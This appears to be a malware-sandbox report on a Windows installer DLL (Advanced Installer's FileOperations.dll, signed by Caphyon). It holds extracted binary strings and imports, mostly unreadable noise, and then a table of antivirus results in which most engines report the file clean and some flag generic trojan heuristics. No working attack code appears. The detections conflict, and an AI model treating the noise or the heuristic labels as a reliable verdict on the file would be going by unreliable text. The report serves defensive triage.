6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
8$8,848<8D8L8T8\8d8l8t8|8
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
;$;,;4;<;D;L;T;\;d;l;t;|;
<$<,<4<<<D<L<T<\<d<l<t<|<
= =(=0=8=@=H=P=X=`=h=p=x=
> >(>0>8>@>H>P>X>`>h>p>x>
? ?(?0?8?@?H?P?X?`?h?p?x?
0 0(00080@0H0P0X0`0h0p0x0
1 1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888@8H8P8X8`8h8
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=
081<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
1D6L6T6\6d6l6t6|6
7$7*9.92969
:$:,:4:<:D:L:T:\:d:l:t:|:
;$;,;4;<;D;L;T;\;d;l;t;|;
<$<,<4<<<D<L<T<\<d<l<t<|<
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>L>T>\>d>l>t>|>
?$?,?4?<?D?L?T?\?d?l?t?|?
0$0,040<0D0L0T0\0d0l0t0|0
1$1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888@8
:8;<;`;p;x;|;
< <(<,<0<8<<<@<H<L<P<X<\<`<h<l<p<x<|<
= =(=,=0=8=<=@=H=L=P=X=\=`=h=l=p=x=|=
> >(>,>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
?$?,?4?<?D?L?T?\?d?l?t?|?
0$0,040<0D0L0T0\0d0l0t0|0
1 1(141<1H1P1\1d1p1
2 2$2(2,2024282<2@2D2H2L2T2X2\2`2d2h2l2p2t2x2|2
3 3(3,34383@3D3L3P3X3\3d3h3p3t3|3
4 4$4,40484<4D4H4P4T4\4`4h4l4t4x4
8?<?@?D?H?L?P?T?X?\?`?
809@9D9H9L9d9h9x9|9
:4:D:H:X:\:`:d:l:
;$;4;8;H;L;T;l;|;
343<3D3L3|3
4 4,4L4X4`4
5(545T5\5h5
6$606P6\6|6
6 707<7\7h7
8 8@8H8X8|8
9 9D9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
;4;@;`;h;p;x;
<$<,<4<<<D<L<X<|<
=4=<=\=d=
>D?L?T?\?d?l?t?|?
0(0H0P0\0|0
1,181X1`1l1
2 2@2L2l2t2
3$3,343<3D3P3p3x3
4D4T4`4
545<5D5L5T5\5d5l5t5
6 6(606<6\6d6l6x6
7$7,747<7D7L7T7\7d7l7x7
8$808P8X8h8
949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
;(;H;T;t;
<0<<<\<d<p<
=$=,=8=X=`=h=p=x=
>,>4><>D>L>T>\>d>l>t>|>
? ?0?T?\?d?l?t?|?
040<0D0L0T0\0d0l0t0|0
141<1D1L1T1\1d1l1
2$202P2\2|2
3,343<3L3T3l3t3
4<4D4P4p4x4
5(5H5T5t5|5
6$6,646@6`6p6
7 7(747T7`7
848<8D8P8t8|8
9$9,949@9`9h9t9
:4:<:D:P:p:x:
;$;,;4;<;D;L;X;x;
< <(<8<\<d<l<t<|<
= =@=L=l=t=|=
>(>H>P>X>`>h>t>
?<?D?P?p?x?
0,040@0`0h0p0|0
1$101P1\1|1
2$202P2X2d2
303<3\3h3
4$4,444l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6`6
7$7,747<7D7L7T7\7d7l7t7|7
8 8D8L8T8\8d8l8t8|8
9$9,949@9`9h9p9x9
:$:,:4:<:D:L:T:`:
;$;,;4;<;D;L;T;\;d;l;t;|;
<$<,<4<<<D<L<T<\<d<l<x<
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>L>T>\>d>l>t>
>4?<?D?L?T?\?d?l?x?
0$0,040<0D0P0t0|0
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2|2
3(3H3P3\3|3
4$4,444<4D4L4T4\4d4l4t4|4
545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
8$8,848<8D8L8T8\8d8l8t8|8
9$9,949<9D9L9T9\9d9l9t9|9
:(:H:P:X:d:
; ;@;H;P;X;h;
<$<,<4<<<D<L<T<\<d<l<t<|<
=(=0=8=@=H=P=\=|=
>$>,>4><>D>L>T>\>h>
?$?0?T?\?d?l?t?|?
0<0H0h0p0x0
1$1,10141<1P1X1`1h1l1p1x1
202P2p2|2
30383<3X3`3d3t3
404L4P4p4
505P5p5
606P6p6
707P7p7
0p0t0x0|0
1(181H1X1p1|1
3 :$:,:0:8:<:D:H:P:l:
;,;H;d;
thawte, Inc.1(0&
Certification Services Division1806
/(c) 2006 thawte, Inc. - For authorized use only10
thawte Primary Root CA0
131210000000Z
231209235959Z0L1
thawte, Inc.1&0$
thawte SHA256 Code Signing CA0
http://t2.symcb.com0
!http://t1.symcb.com/ThawtePCA.crl0
SymantecPKI-1-5680
UwM^6)
thawte, Inc.1&0$
thawte SHA256 Code Signing CA0
200306000000Z
230305235959Z0
Craiova1
Caphyon SRL1'0%
SECURE APPLICATION DEVELOPMENT1
Caphyon SRL0
http://tl.symcb.com/tl.crl0
https://www.thawte.com/cps0/
!https://www.thawte.com/repository0W
http://tl.symcd.com0&
http://tl.symcb.com/tl.crt0
thawte, Inc.1&0$
thawte SHA256 Code Signing CA
"https://www.advancedinstaller.com 0
20201125113122Z0
Symantec Corporation10
Symantec Trust Network110/
(Symantec SHA256 TimeStamping Signer - G3
VeriSign, Inc.10
VeriSign Trust Network1:08
1(c) 2008 VeriSign, Inc. - For authorized use only1806
/VeriSign Universal Root Certification Authority0
160112000000Z
310111235959Z0w1
Symantec Corporation10
Symantec Trust Network1(0&
Symantec SHA256 TimeStamping CA0
https://d.symcb.com/cps0%
https://d.symcb.com/rpa0.
http://s.symcd.com06
%http://s.symcb.com/universal-root.crl0
TimeStamp-2048-30
Symantec Corporation10
Symantec Trust Network1(0&
Symantec SHA256 TimeStamping CA0
171223000000Z
290322235959Z0
Symantec Corporation10
Symantec Trust Network110/
(Symantec SHA256 TimeStamping Signer - G30
?'J3Nm
https://d.symcb.com/cps0%
https://d.symcb.com/rpa0@
/http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
http://ts-ocsp.ws.symantec.com0;
/http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
TimeStamp-2048-60
U){9FN
Symantec Corporation10
Symantec Trust Network1(0&
Symantec SHA256 TimeStamping CA
201125113122Z0/
/1(0&0$0"
WLyE\bR
,`!6>3
$n[mN>#
wwwwwx
DDDDDOx
DDDDDOx
wwwwwwwx
DDDDDOx
DDDDDOx
wwwwwwwwwtw
wwwwww
v\!0~v{
yymmm{
yymj"joo
"jm{o~~
"j{oo~
"j"jo~~
""j{oo~
mm{{{oo~~
mm{{o~
332333333333333
33$DDDDDDDDDDD@1
2DDDDDDDDDDDDD
2DDDDDD@DDDDDDC
2DDDDDD34DDDDDC
2DDDDD@30DDDDD
3$DDDDD34DDDDD1
3$DDDDD@DDDDD@1332DDDDDDDDDDDC
332DDDDDCDDDDD
333$DDDD
333$DDDD#$DDD@133332DDDD34DDDC
33332DDD@30DDD
33333$DDB32DDD1
33333$DDC33DD@13333332DDC33DDC
3333332DDC33DD
3333333$DC33DD1
3333333$DC33D@1333333332D@30DC
333333332DDDDD
333333333$DDDD1
333333333$DDD@133333333332DDDC
33333333332DDD
33333333333$DD1
33333333333$D@13333333333332D
3333333333333"#33333333333333333333333
$.' ",#
(7),01444'9=82<.342
!22222222222222222222222222222222222222222222222222
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
?0E}5$
+Kin'p
pn'yH=
-Es=Jk
!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
<H.t.I
wEj WP
;S t>3
C(;C,t
l$$_^[
$_[^]Y
EhSVWP
<J"u6Q
Pt&j+W
6SVQRQ
ExSVWP
CE`Ph0A
CE`Ph\A
ExSVWP
E|SVWP
ExSVWP
ExSVWP
CE`PhlK
E,SVWP
E,SVWP
E,SVWP
0jFhXL
0jthXL
q@;p s
C8u";w
q@;p(s
Ah;A\s`
Ah;A\r
F,;F(s
Fast decoding Code from Chris Anderson
invalid literal/length code
invalid distance code
invalid distance too far back
wkPSQR
Genuu8
ntelu0
ineIu(
QQSVWd
URPQQhm
;t$,v-
UQPXY]Y[
Tt)jhZf;
Jjl^f;
V2jx_f;
F2jgYf;
PPPPPPPP
u,PQRS
Wj0XPV
SPjdVQ
PPPPPWS
PP9E u:PPVWP
<at.<rt!<wt
<=upG8
D8(Ht'
zSSSSj
f9:t!V
CY<u
QQSVj8j@
PPPPPPPP
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
incorrect header check
unknown compression method
invalid window size
unknown header flags set
header crc mismatch
invalid block type
invalid stored block lengths
too many length or distance symbols
invalid code lengths set
invalid bit length repeat
invalid code -- missing end-of-block
invalid literal/lengths set
invalid distances set
invalid literal/length code
invalid distance code
invalid distance too far back
incorrect data check
incorrect length check
Qkkbal
[-&LMb#{'
w+OQvr
INSKyu
)\ZEo^m/
H*0"ZOW
mj>zjZ
IiGM>nw
ewh/?y
OZw3(?
V_:X1:
need dictionary
stream end
file error
stream error
data error
insufficient memory
buffer error
incompatible version
inflate 1.2.7 Copyright 1995-2012 Mark Adler
bad allocation
bad function call
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
cross device link
destination address required
device or resource busy
directory not empty
executable format error
file exists
file too large
filename too long
function not supported
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
interrupted
invalid argument
invalid seek
io error
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no lock available
no message available
no message
no protocol option
no space on device
no stream resources
no such device or address
no such device
no such file or directory
no such process
not a directory
not a socket
not a stream
not connected
not enough memory
not supported
operation canceled
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
permission denied
protocol error
protocol not supported
read only file system
resource deadlock would occur
resource unavailable try again
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many files open
too many links
too many symbolic link levels
value too large
wrong protocol type
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
InitOnceExecuteOnce
CreateEventExW
CreateSemaphoreW
CreateSemaphoreExW
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
CreateSymbolicLinkW
GetCurrentPackageId
GetTickCount64
GetFileInformationByHandleEx
SetFileInformationByHandle
GetSystemTimePreciseAsFileTime
InitializeConditionVariable
WakeConditionVariable
WakeAllConditionVariable
SleepConditionVariableCS
InitializeSRWLock
AcquireSRWLockExclusive
TryAcquireSRWLockExclusive
ReleaseSRWLockExclusive
SleepConditionVariableSRW
CreateThreadpoolWork
SubmitThreadpoolWork
CloseThreadpoolWork
CompareStringEx
GetLocaleInfoEx
LCMapStringEx
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
(null)
[aOni*{
~ $s%r
@b;zO]
v2!L.2
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
AreFileApisANSI
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
_hypot
_nextafter
UTF-16LEUNICODE
1#QNAN
1#SNAN
]vQ<)8
|)P!?Ua0
Eb2]A=
u?^p?o4
y1~?|"
?x+s7
?5Od%
?|I7Z#
>,'1D=
?g)([|X>=
~U`?K
:h"?bC
@H#?43
Ax#?uN}*
r7Yr7=
F0$?3=1
H`$?h|
&?~YK|
sU0&?W
<8bunz8
?#%X.y
F||<##
<@En[vP
b<log10
?5Wg4p
%S#[k=
"B <1=
string too long
bad array new length
Unknown exception
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
ConvertStringSidToSidW
vector too long
invalid string position
list too long
map/set too long
RegDeleteKeyTransactedW
RegDeleteKeyExW
RegCreateKeyTransactedW
RegOpenKeyTransactedW
invalid string_view position
OnExpandArchInstall start.
OnExpandArchInstall end.
OnExpandArchUninstall start.
OnExpandArchUninstall end.
OnExpandArchConfig start.
OnExpandArchConfig end.
OnExpandArchRollback start.
OnExpandArchRollback end.
OnExpandArchRemove start.
OnExpandArchRemove end.
This operation was not installed, nothing to revert
Do not remove files on unistall option was found, nothing to revert
OnFdInstall start.
OnFdInstall end.
OnFdUninstall start.
OnFdUninstall end.
OnFdConfig start.
OnFdConfig end.
OnFdRollback start.
OnFdRollback end.
OnFdRemove start.
OnFdRemove end.
Operations count : [
File was set not to be removed : [
C:\JobRelease\win\Release\custact\x86\FileOperations.pdb
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCC
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.tls$ZZZ
.xdata$x
.edata
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.rsrc$01
.rsrc$02
FileOperations.dll
OnExpandArchConfig
OnExpandArchInstall
OnExpandArchRemove
OnExpandArchRollback
OnExpandArchUninstall
OnFdConfig
OnFdInstall
OnFdRemove
OnFdRollback
OnFdUninstall
InternetCrackUrlW
InternetCloseHandle
InternetSetStatusCallbackW
InternetSetOptionW
InternetOpenW
InternetGetLastResponseInfoW
InternetReadFile
InternetQueryDataAvailable
FtpGetFileSize
InternetQueryOptionW
HttpQueryInfoW
InternetConnectW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpCommandW
InternetErrorDlg
WININET.dll
msi.dll
WNetAddConnection2W
MPR.dll
CopyFileExW
GetLastError
FileTimeToSystemTime
SystemTimeToFileTime
CompareFileTime
DeleteFileW
MoveFileW
CopyFileW
CreateFileW
CloseHandle
LoadLibraryW
GetProcAddress
RemoveDirectoryW
GetTempPathW
GetTempFileNameW
CreateDirectoryW
WaitForSingleObject
GetCurrentProcess
GetModuleHandleW
HeapDestroy
HeapSize
HeapReAlloc
HeapFree
HeapAlloc
GetProcessHeap
SizeofResource
LockResource
LoadResource
FindResourceW
FindResourceExW
RaiseException
GetTickCount
LocalFree
LocalAlloc
FreeLibrary
GetFileSize
FindFirstFileW
SetFilePointer
ReadFile
FindClose
MultiByteToWideChar
WideCharToMultiByte
FormatMessageW
GetFileTime
SetLastError
FindNextFileW
GetFileAttributesW
WriteFile
SetFileTime
GetModuleFileNameW
lstrcmpiW
DosDateTimeToFileTime
LocalFileTimeToFileTime
DeleteCriticalSection
EnterCriticalSection
InitializeCriticalSection
LeaveCriticalSection
OutputDebugStringW
GetCurrentProcessId
GetCurrentThreadId
FlushFileBuffers
GetStringTypeW
ResetEvent
CreateEventW
SetEvent
GlobalFree
GlobalFindAtomW
GetStdHandle
InitializeCriticalSectionAndSpinCount
DecodePointer
KERNEL32.dll
GetForegroundWindow
MessageBoxW
wsprintfW
USER32.dll
OpenProcessToken
GetTokenInformation
RegCloseKey
RegSetValueExW
RegQueryInfoKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumValueW
RegOpenKeyExW
RegCreateKeyExW
GetSecurityDescriptorDacl
SetEntriesInAclW
InitializeSecurityDescriptor
SetSecurityDescriptorDacl
LookupAccountSidW
ADVAPI32.dll
CoCreateGuid
ole32.dll
OLEAUT32.dll
PathFileExistsW
PathIsUNCW
SHLWAPI.dll
IsDebuggerPresent
EncodePointer
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetSystemTimeAsFileTime
LCMapStringW
GetCPInfo
WaitForSingleObjectEx
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
GetStartupInfoW
QueryPerformanceCounter
InitializeSListHead
RtlUnwind
InterlockedFlushSList
LoadLibraryExW
ExitProcess
GetModuleHandleExW
GetFileType
GetConsoleMode
ReadConsoleW
SetFilePointerEx
GetConsoleOutputCP
GetFileSizeEx
FindFirstFileExW
IsValidCodePage
GetACP
GetOEMCP
GetCommandLineA
GetCommandLineW
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetStdHandle
SetEndOfFile
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVbad_function_call@std@@
.?AVtype_info@@
.?AVbad_exception@std@@
.?AVCAtlException@ATL@@
.?AVbad_array_new_length@std@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AV_com_error@@
.?AVException@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
060B0v0
1"1F1R1W1g1l1}1
2 2,282D2N2Z2d2p2\3
4*434M4d4m4
66R6j6
6B7M7]7
<#<f<s<
=!=3===G=Q=[=d=r=
6#6F6S6s6
7.7R7_7
8F8T8n8
849F9S9j9
;B<I<~<
0#0;0K0
2*272D2R2c2i2m2s2w2}2
6$7f7r7
8<9C9h9l9p9t9
?.?j?s?
3 3$3(3@3
4M4f4s4
6-6F6S6g6u6f7u7f:u:6;C;W;e;:=m=
=->F>S>g>u>
F0z0f1w1
2 3'3.353<3C3J3Q3X3_3f3m3x3
?"?3?x?
=(=6?G?
222:2G2U2f2l2v2
<%<H<s<
1M2q233T3
849f9x9
9Y:`:j:
1f2w2f3v3
;6=G=V?g?
8B:f:x:
8$9V9e9
<S<Y<b<i<
&060p0
6 7*72787A7H7M7S7[7a7i7
78%8G8N8
869G9v:
%050v3
030>0X0b0f0l0y0
263C3a3
5%5V5s5
;(;A=P=
>V?d?{?
0.090F0T0k0
2!2f3w3>4L4^4l4
<B<Y<g<
==(=<=U=c=
3[4a4h4
5>6Y6o6
7)7F7{7
78:8H8e8
9^:o:}:
>$?+?F?P?T?X?\?`?
<(<@<F<M<
=)=/=}=
7 8$8(8,8084888
A0Q0=1
4"4+4V4h4
6'656f6s6
8#8;8C8P8^8w8
9,929a9n9
3%3;3{3
5K6U6k6
;=;E;v;
<F<S<m<
3U3_3k3
3$4>4j4
7&7+7r7
8@9m96:Y:m:}:
9#9/9;9J9\9n9
:=:O:t:
:?;Q;v;
<%<7<A<L<[<f<}<
>)>X?\?
4+5:5l5|5
;n;<<i<
203]3&4E4O4_4f4s4x4
6,7f7s7
=6>E>w>
f0v0F2R2g2q2
798T9X9\9`9d9h9l9p9t9x9|9
>%>1>;>U>\>h>r>
?"?A?K?W?a?
141I1h1
252U2d2w2
3(3=3E3K3Y3a3
44%4+40464<4A4G4M4R4X4^4c4i4o4t4z4
5$5*5/555;5@5F5L5Q5W5]5b5h5n5s5y5
6#6)6.646:6?6E6K6P6V6\6a6f6m6r6
7+71767<7G7M7X7_7d7m7{7
8$858<8d8l8y8
;#;);;;E;
;&</<:<A<a<g<m<s<y<
=,=5=f=l=r=x=~=
?&?+?8?z?
0e0w061s1
5 555>5m5v5
5G6d6x6
7P7Y7`7f7l7
9&:7:^<
2;3@3D3H3L3
='>/>A>N>p>
2 2&2A2i2}2
2B3Q314a6
2!2F2b2
3@3S3{3
414;4G4L4Q4o4y4
6#6/6Z6H7R7_7
7+8N8U8h8
4/4Q4e4
5S6W6[6_6c6g6k6o6
6o7s7w7{7
9@<G<l<p<t<x<|<
"081k1
8J9W9g9t9^:
:$;+;6;D;K;Q;l;s;
>G?T?c?x?
0)111;1D1U1g1v1
636N6^6c6m6r6}6
;@;Q;V;~;
111Z1o1
2*272`2g2
3;3L3f3l3~3
3'414T4^4w4
4g5D6K6
2*2A2d2y2
4-5?5s5
:%:A:O:[:g:{:
:$;<;L;`;e;j;
<#<2<=<B<G<b<q<|<
<2=V=z=
0"080@0
7h8p849
<'=E=c=
1W1a1|1
8.9F9y9
;/<F<o<
9(9G9 :
? ?[?q?
091E1]1e1
516`6-7A7Y7a7
8(909=9M:~:
0%060u0
5E6N6f6
C0J0Q0X0r0
1@1h1W3z3
4j4s4w4}4
6'7,72777
=)=;=M=_=q=
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Generic.4!c
MicroWorld-eScan Trojan.GenericKD.37867413
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
McAfee RDN/Generic.dx
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Cyren Clean
Symantec Trojan.Gen.MBT
ESET-NOD32 a variant of Generik.BHNHRYC
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Trojan.GenericKD.37867413
NANO-Antivirus Clean
SUPERAntiSpyware Clean
Rising Clean
Ad-Aware Trojan.GenericKD.37867413
Emsisoft Trojan.GenericKD.37867413 (B)
Comodo TrojWare.Win32.Agent.ydkps@0
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition RDN/Generic.dx
FireEye Trojan.GenericKD.37867413
Sophos Clean
SentinelOne Clean
GData Trojan.GenericKD.37867413
Jiangmin Clean
Avira Clean
MAX malware (ai score=80)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit JS.Heur.Bomber.2.7DA87B69.Gen
ViRobot Clean
ZoneAlarm HEUR:Trojan.Script.Generic
Microsoft Clean
AhnLab-V3 Clean
BitDefenderTheta Clean
ALYac JS.Heur.Bomber.2.7DA87B69.Gen
TACHYON Clean
VBA32 Clean
Zoner Trojan.DOC.97896
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet PossibleThreat
AVG Other:Malware-gen [Trj]
No IRMA results available.